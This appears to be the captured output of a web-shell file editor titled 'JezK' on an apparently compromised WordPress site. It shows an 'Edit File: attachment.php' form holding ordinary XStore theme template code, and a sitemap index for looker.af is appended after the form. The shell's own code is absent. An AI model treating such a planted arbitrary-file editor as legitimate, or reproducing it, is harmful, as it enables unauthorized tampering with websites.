
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: attachment.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
defined( &#039;ABSPATH&#039; ) || exit( &#039;Direct script access denied.&#039; );

get_header();

global $post;
$post_template  = get_query_var(&#039;et_post-template&#039;, &#039;default&#039;);
$post_share = etheme_get_option(&#039;post_share&#039;, 1);

?&gt;

&lt;?php do_action( &#039;etheme_page_heading&#039; ); ?&gt;

	&lt;div class=&quot;container sidebar-mobile-&lt;?php echo esc_attr( get_query_var(&#039;et_sidebar-mobile&#039;, &#039;bottom&#039;) ); ?&gt;&quot;&gt;
        &lt;div class=&quot;page-content sidebar-position-&lt;?php echo esc_attr( get_query_var(&#039;et_sidebar&#039;, &#039;left&#039;) ); ?&gt;&quot;&gt;
			&lt;div class=&quot;row&quot;&gt;

                &lt;div class=&quot;content &lt;?php echo esc_attr( get_query_var(&#039;et_content-class&#039;, &#039;col-md-9&#039;) ); ?&gt;&quot;&gt;
					&lt;?php if(have_posts()): while(have_posts()) : the_post(); ?&gt;
						&lt;?php
						$post_format 	= get_post_format();
						$slider_id 		= rand(100,10000);
						$post_content 	= get_the_content();
						$gallery_filter = etheme_gallery_from_content( $post_content );
						$classes 		= array();
						$classes[] 		= &#039;blog-post&#039;;
						$classes[] 		= &#039;post-single&#039;;
						$classes[] 		= &#039;post-template-&#039; . $post_template;
						?&gt;
						&lt;article &lt;?php post_class( $classes ); ?&gt; id=&quot;post-&lt;?php the_ID(); ?&gt;&quot; &gt;

							&lt;?php echo wp_get_attachment_image( $post-&gt;ID, &#039;large&#039; ); ?&gt;

							&lt;div class=&quot;post-heading&quot;&gt;
								&lt;h2&gt;&lt;?php the_title(); ?&gt;&lt;/h2&gt;
								&lt;?php etheme_byline(); ?&gt;
							&lt;/div&gt;

							&lt;?php if($post_share): ?&gt;
								&lt;div class=&quot;share-post&quot;&gt;
									&lt;?php echo do_shortcode(&#039;[share title=&quot;&#039;.__(&#039;Share Post&#039;, &#039;xstore&#039;).&#039;&quot;]&#039;); ?&gt;
								&lt;/div&gt;
							&lt;?php endif; ?&gt;

							&lt;div class=&quot;clear&quot;&gt;&lt;/div&gt;

						&lt;/article&gt;

					&lt;?php endwhile; else: ?&gt;

						&lt;h2&gt;&lt;?php esc_html_e(&#039;No posts were found!&#039;, &#039;xstore&#039;) ?&gt;&lt;/h2&gt;

					&lt;?php endif; ?&gt;


				&lt;/div&gt;

				&lt;?php get_sidebar(); ?&gt;

			&lt;/div&gt;

		&lt;/div&gt;
	&lt;/div&gt;

&lt;?php
get_footer();</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
